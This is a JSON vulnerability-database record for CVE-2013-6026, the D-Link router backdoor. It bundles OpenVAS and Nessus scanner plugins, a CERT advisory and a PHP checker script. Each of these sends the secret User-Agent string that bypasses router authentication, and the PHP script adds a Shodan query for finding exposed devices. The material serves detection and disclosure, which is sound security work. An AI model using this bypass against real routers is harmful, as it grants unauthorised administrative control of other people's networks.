"2013-10-14T00:00:00", "references": ["http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/", "http://www.d-link.com/"], "reporter": "This script is Copyright (C) 2013 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_dlink_multiple_devices_backdoor_10_2013.nasl 11096 2018-08-23 12:49:10Z mmartin $\n#\n# D-Link Multiple Devices Backdoor\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103810\");\n script_version(\"$Revision: 11096 $\");\n script_cve_id(\"CVE-2013-6026\");\n script_bugtraq_id(62990);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_name(\"D-Link Multiple Devices Backdoor\");\n\n\n script_xref(name:\"URL\", value:\"http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/\");\n script_xref(name:\"URL\", value:\"http://www.d-link.com/\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-23 14:49:10 +0200 (Thu, 23 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-10-14 19:24:10 +0200 (Mon, 14 Oct 2013)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"thttpd-alphanetworks/banner\");\n\n script_tag(name:\"impact\", value:\"This vulnerability allows remote attackers to gain complete\nadministrative access to affected devices.\");\n script_tag(name:\"vuldetect\", value:\"Try to bypass authentication by using 'xmlset_roodkcableoj28840ybtide' as HTTP User-Agent.\");\n script_tag(name:\"insight\", value:\"By setting the User-Agent header to 'xmlset_roodkcableoj28840ybtide', it is\npossible to access the web interface without any authentication.\");\n script_tag(name:\"solution\", value:\"Ask the Vendor for an update.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Various D-Link DSL routers are susceptible to a remote authentication\nbypass vulnerability.\");\n script_tag(name:\"affected\", value:\"Various D-Link routers are affected.\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = get_http_port(default:80);\n\nbanner = get_http_banner(port:port);\nif(!banner || (\"thttpd-alphanetworks\" >!< banner && \"Alpha_webserv\" >!< banner))exit(0);\n\nhost = http_host_name(port:port);\n\nreq = 'GET / HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n';\n\nresult = http_send_recv(port:port, data:req + '\\r\\n', bodyonly:FALSE);\n\nif(result !~ \"HTTP/1.. (401|302)\" || \"self.location.href\" >< result)exit(0);\n\nreq += 'User-Agent: xmlset_roodkcableoj28840ybtide\\r\\n';\n\nresult = http_send_recv(port:port, data:req + '\\r\\n', bodyonly:FALSE);\n\nif(result =~ \"HTTP/1.. 200\" || (result !~ \"HTTP/1\" && \"self.location.href\" >< result)) {\n security_message(port:port);\n exit(0);\n}\n\nexit(99);\n", "title": "D-Link Multiple Devices Backdoor", "type": "openvas", "viewCount": 5}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-24T21:34:15"}], "edition": 7, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "cc6103a83dab7756770a7759ed375417"}, {"key": "cvss", "hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d"}, {"key": "description", "hash": "62e9ecc3d5f2308a87c0f33e4ea8671e"}, {"key": "href", "hash": "241b1a09dade3b551c9ee7962ca9bfe2"}, {"key": "modified", "hash": "8be90a922e3fddc17514b9fd17f39e9b"}, {"key": "naslFamily", "hash": "55199d25018fbdb9b50e6b64d444c3a4"}, {"key": "pluginID", "hash": "d8fe80eceeb50388ccd28092dcb46448"}, {"key": "published", "hash": "8575eeab9770297afdf096c6d7fa3964"}, {"key": "references", "hash": "b7b74fcd6ba53f37bce86b9b19fcdcd9"}, {"key": "reporter", "hash": "c8c11c18def3783b9fd2759746494ece"}, {"key": "sourceData", "hash": "9f7dccc7b49b13b7e193ec41f56bf6fb"}, {"key": "title", "hash": "421e76e9ab8acea739e471557ba0972a"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "hash": "548d4f024ae4429b6c9b28cad42065e0f96c379690219fd39d3615f8faa7a612", "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-6026"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:123848"]}, {"type": "nessus", "idList": ["DLINK_ROUTER_USER_AGENT_AUTH_BYPASS.NASL"]}, {"type": "cert", "idList": ["VU:248083"]}], "modified": "2019-05-29T18:37:59"}, "score": {"value": 7.7, "vector": "NONE", "modified": "2019-05-29T18:37:59"}, "vulnersScore": 7.7}, "objectVersion": "1.3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_dlink_multiple_devices_backdoor_10_2013.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# D-Link Multiple Devices Backdoor\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103810\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-6026\");\n script_bugtraq_id(62990);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_name(\"D-Link Multiple Devices Backdoor\");\n\n\n script_xref(name:\"URL\", value:\"http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/\");\n script_xref(name:\"URL\", value:\"http://www.d-link.com/\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-10-14 19:24:10 +0200 (Mon, 14 Oct 2013)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"thttpd-alphanetworks/banner\");\n\n script_tag(name:\"impact\", value:\"This vulnerability allows remote attackers to gain complete\nadministrative access to affected devices.\");\n script_tag(name:\"vuldetect\", value:\"Try to bypass authentication by using 'xmlset_roodkcableoj28840ybtide' as HTTP User-Agent.\");\n script_tag(name:\"insight\", value:\"By setting the User-Agent header to 'xmlset_roodkcableoj28840ybtide', it is\npossible to access the web interface without any authentication.\");\n script_tag(name:\"solution\", value:\"Ask the Vendor for an update.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Various D-Link DSL routers are susceptible to a remote authentication\nbypass vulnerability.\");\n script_tag(name:\"affected\", value:\"Various D-Link routers are affected.\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = get_http_port(default:80);\n\nbanner = get_http_banner(port:port);\nif(!banner || (\"thttpd-alphanetworks\" >!< banner && \"Alpha_webserv\" >!< banner))exit(0);\n\nhost = http_host_name(port:port);\n\nreq = 'GET / HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n';\n\nresult = http_send_recv(port:port, data:req + '\\r\\n', bodyonly:FALSE);\n\nif(result !~ \"HTTP/1.. (401|302)\" || \"self.location.href\" >< result)exit(0);\n\nreq += 'User-Agent: xmlset_roodkcableoj28840ybtide\\r\\n';\n\nresult = http_send_recv(port:port, data:req + '\\r\\n', bodyonly:FALSE);\n\nif(result =~ \"HTTP/1.. 200\" || (result !~ \"HTTP/1\" && \"self.location.href\" >< result)) {\n security_message(port:port);\n exit(0);\n}\n\nexit(99);\n", "naslFamily": "Web application abuses", "pluginID": "1361412562310103810", "scheme": null}
{"cve": [{"lastseen": "2019-05-29T18:13:06", "bulletinFamily": "NVD", "description": "The web interface on D-Link DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, and TM-G5240 routers; Planex BRL-04R, BRL-04UR, and BRL-04CW routers; and Alpha Networks routers allows remote attackers to bypass authentication and modify settings via an xmlset_roodkcableoj28840ybtide User-Agent HTTP header, as exploited in the wild in October 2013.", "modified": "2013-10-21T16:40:00", "id": "CVE-2013-6026", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6026", "published": "2013-10-19T10:36:00", "title": "CVE-2013-6026", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:53", "bulletinFamily": "exploit", "description": "", "modified": "2013-10-30T00:00:00", "published": "2013-10-30T00:00:00", "href": "https://packetstormsecurity.com/files/123848/D-Link-Backdoor-Czechr.html", "id": "PACKETSTORM:123848", "type": "packetstorm", "title": "D-Link Backdoor Czechr", "sourceData": "`#!/usr/bin/php \n<?php \n/* \n.---------------------------------. \n| | \n| dlinkd - D-link backdoor czechr | \n| | \n.-------------------------------------------------------------------------------. \n| Written by @dustyfresh - 10/13 | \n.-------------------------------------------------------------------------------. \n| See: http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/ \n| http://www.security-database.com/detail.php?alert=CVE-2013-6026 \n| Usage(command-line only): \n| ./dlinkd http://192.168.1.1:8080/ \n| Shodan dork: \n| thttpd-alphanetworks/2.23 \n.-------------------------------------------------------------------------------. \n| Educational purposes only, kkthnx. | \n| http://rootatx.com/ || http://staypimp.in/ | \n.-------------------------------------------------------------------------------. \n| GNU GENERAL PUBLIC LICENSE \n| \n| Version 3, 29 June 2007 \n| \n| Copyright \u00a9 2007 Free Software Foundation, Inc. <http://fsf.org/> \n| Everyone is permitted to copy and distribute verbatim copies of this license \n| document, but changing it is not allowed. \n| \n| http://www.gnu.org/licenses/gpl.html \n.-------------------------------------------------------------------------------. \n*/ \nerror_reporting(1); \nset_time_limit(0); // ain't nobody got time fo' dat \n$help = \"\\t--help, this help menu\\n\\nexample: ./dlinkd http://192.168.1.1:8080\\n\"; \n$host = $argv[1]; \n$curl = curl_init($host); \n$swag = array( \nCURLOPT_HEADER => 'true', \nCURLOPT_POST => 'true', \nCURLOPT_USERAGENT => 'xmlset_roodkcableoj28840ybtide', // the secret ingredient \nCURLOPT_RETURNTRANSFER => 1 \n); \ncurl_setopt_array($curl,$swag); \nswitch($argv[1]){ \ncase NULL: \ndie($help); \nbreak; \ncase \"--help\": \ndie($help); \nbreak; \n} \n$sup = curl_exec($curl); \n$return = curl_getinfo($curl); \ncurl_close($curl); \n$exit = $return['http_code']; \nif($exit != 200){ \nprint \"[$host] :( This door is locked.\\n\"; \n} else { \nprint \"THIS IS A TRIUMPH! [$host] is vulnerable\\n\"; \n// 'murica, ah'll tell u whut \n} \n?> \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/123848/dlinkd-backdoor-checker.txt"}], "nessus": [{"lastseen": "2019-11-01T02:25:58", "bulletinFamily": "scanner", "description": "The remote web server is affected by an authentication bypass\nvulnerability due to a flaw in the ", "modified": "2019-11-02T00:00:00", "id": "DLINK_ROUTER_USER_AGENT_AUTH_BYPASS.NASL", "href": "https://www.tenable.com/plugins/nessus/70447", "published": "2013-10-15T00:00:00", "title": "alpha_auth_check() Function Remote Authentication Bypass", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70447);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/11/28 22:47:41\");\n\n script_cve_id(\"CVE-2013-6026\");\n script_bugtraq_id(62990);\n script_xref(name:\"CERT\", value:\"248083\");\n\n script_name(english:\"alpha_auth_check() Function Remote Authentication Bypass\");\n script_summary(english:\"Attempts to bypass login\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server is affected by an authentication bypass\nvulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote web server is affected by an authentication bypass\nvulnerability due to a flaw in the 'alpha_auth_check()' function. A\nremote, unauthenticated attacker can exploit this issue by sending a\nrequest with the user agent string set to\n'xmlset_roodkcableoj28840ybtide'. This could allow the attacker to\nbypass authentication and gain access to the device using a\nvendor-supplied backdoor. \n\nNote that several D-Link and Planex model routers are reportedly\naffected by this issue.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/\");\n # http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10001\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?764b1d41\");\n script_set_attribute(attribute:\"solution\", value:\n\"If the affected router is a DIR-100, DIR-120, DI-524, DI-524UP,\nDI-604UP, DI-604+, DI-624S, or TM-G5240, apply the appropriate firmware\nupdate. Otherwise, contact the vendor or replace the router.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:d-link:router\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80, embedded:TRUE);\n\nbanner = get_http_banner(port:port, exit_on_fail:TRUE);\nif (\"thttpd-alphanetworks/\" >!< banner && \"Alpha_webserv\" >!< banner) audit(AUDIT_HOST_NOT, \"affected\");\n\nres = http_send_recv3(\n method : \"GET\",\n port : port,\n item : \"/\",\n add_headers : make_array(\"User-Agent\", \"xmlset_roodkcableoj28840ybtide\"),\n follow_redirect: 1,\n exit_on_fail : TRUE\n);\n\nif (\n res[0] =~ \"200\" &&\n \"Home/bsc_internet.htm\" >< res[2] &&\n \"/public/logout.htm\" >< res[2]\n)\n{\n req = http_last_sent_request();\n\n # Unless we're paranoid, make sure the page is not accessible without the User-Agent header.\n if (report_paranoia < 2)\n {\n res2 = http_send_recv3(\n method : \"GET\",\n port : port,\n item : \"/\",\n follow_redirect: 1,\n exit_on_fail : TRUE\n );\n\n if (\n res2[0] =~ \"200\" &&\n \"Home/bsc_internet.htm\" >< res2[2] &&\n \"/public/logout.htm\" >< res2[2]\n ) exit(0, \"The web server on port \"+port+\" does not require credentials.\");\n }\n\n if (report_verbosity > 0)\n {\n report =\n '\\nNessus was able to verify this issue by sending the following request :' +\n '\\n' +\n '\\n' + req +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2019-10-09T19:49:41", "bulletinFamily": "info", "description": "### Overview \n\nVarious D-Link routers allow administrative web actions if the HTTP request contains a specific User-Agent string. This backdoor allows an attacker to bypass password authentication and access the router's administrative web interface. Planex and Alpha Networks devices may also be affected.\n\n### Description \n\nCVE-2013-6026:\n\nAccording to security researcher Craig Heffner, the firmware for various D-Link routers contains a backdoor that allows unauthenticated remote users to bypass the routers' password authentication mechanism. A router's internal web server will accept and process any HTTP requests that contain the User-Agent string \"xmlset_roodkcableoj28840ybtide\" without checking if the connecting host is authenticated. \n \nD-Link has confirmed that the affected D-Link routers disable web configuration from the WAN by default. \n \nAccording to D-Link, the following D-Link routers are affected: \n\n\n * DIR-100\n * DIR-120\n * DI-624S\n * DI-524UP\n * DI-604S\n * DI-604UP\n * DI-604+\n * TM-G5240\n \nAccording to [the original vulnerability report](<http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/>), the following Planex routers are likely affected: \n\n\n * BRL-04R\n * BRL-04UR\n * BRL-04CW\n \nIt appears that Alpha Networks may be the OEM for routers branded by D-Link and Planex (and probably other vendors). It is not clear where in the supply chain the backdoor was added, so routers from any of these vendors may be affected. \n \nCVE-2013-6027: \nA separate stack overflow vulnerability in the management web server has also been [reported](<http://pastebin.com/vbiG42VD>). \n--- \n \n### Impact \n\nAn unauthenticated remote attacker can take any action as an administrator using the remote management web server. \n \n--- \n \n### Solution \n\nD-Link is [maintaining a page](<http://www.dlink.com/be/fr/support/security>) to inform users of this issue and provide updates as patches are released. \n \n--- \n \n**Restrict Access** \n \nRestrict access to the administrative web server by disabling remote management features or by blocking HTTP requests on the external WAN interface. The administrative web server may listen on ports 80/tcp or 8080/tcp. \n \nD-Link has confirmed that the affected D-Link routers disable web configuration from the WAN by default. There is some [evidence ](<http://blog.erratasec.com/2013/10/that-dlink-bug-masscan.html>)that at least one ISP may have deployed vulnerable routers with the remote WAN management enabled. \n \n--- \n \n### Vendor Information\n\n248083\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ D-Link Systems, Inc.\n\nNotified: October 16, 2013 Updated: October 17, 2013 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Alpha Networks Inc\n\nUpdated: October 17, 2013 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Planex Communications Inc\n\nUpdated: October 17, 2013 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 8.3 | AV:A/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 7.5 | E:F/RL:W/RC:C \nEnvironmental | 5.6 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/>\n * <http://www.theregister.co.uk/2013/10/13/dlink_routers_have_admin_backdoor/>\n * <http://www.dlink.com/uk/en/support/security>\n * <http://blog.erratasec.com/2013/10/that-dlink-bug-masscan.html>\n * <http://pastebin.com/vbiG42VD>\n\n### Acknowledgements\n\nThanks to Craig Heffner of /DEV/TTYS0 for reporting this vulnerability.\n\nThis document was written by Todd Lewellen.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2013-6026, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6026>) [CVE-2013-6027](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6027>) \n---|--- \n**Date Public:** | 2013-10-12 \n**Date First Published:** | 2013-10-17 \n**Date Last Updated: ** | 2014-07-29 23:29 UTC \n**Document Revision: ** | 33 \n", "modified": "2014-07-29T23:29:00", "published": "2013-10-17T00:00:00", "id": "VU:248083", "href": "https://www.kb.cert.org/vuls/id/248083", "type": "cert", "title": "D-Link routers authenticate administrative access using specific User-Agent string", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
